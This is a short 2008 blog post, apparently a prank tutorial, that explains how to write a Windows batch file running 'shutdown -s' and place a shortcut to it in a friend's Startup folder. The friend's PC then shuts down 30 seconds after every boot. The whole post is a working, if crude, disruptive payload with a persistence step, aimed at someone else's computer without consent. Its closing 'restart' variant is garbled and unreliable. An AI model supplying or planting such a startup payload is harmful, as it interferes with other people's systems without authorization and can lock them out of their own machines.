Make Computer Keep Restarting
Posted On Monday, October 27, 2008 at at 9:06 AM by Ronak1.Open note pad .
2.Type "shutdown -s" without quotes.
3.Save the file with .bat extension.
4.You have created a program which shutdowns the PC within 30 seconds
of executing the file.
5. Now open "x:\Documents and Settings\USERNAME\Start Menu\Programs\Startup\" (x->is the drive on which your windows has been installed and USERNAME is the username)
6.Paste a shortcut on this directory.
NOW WHEN EVER UR FRIEND STARTS HIS PC a count down will start and after 30 seconds his PC will shutdown.
You can also make his pc restart instead of shutting down just by replace "shutdown -s" "restart _s"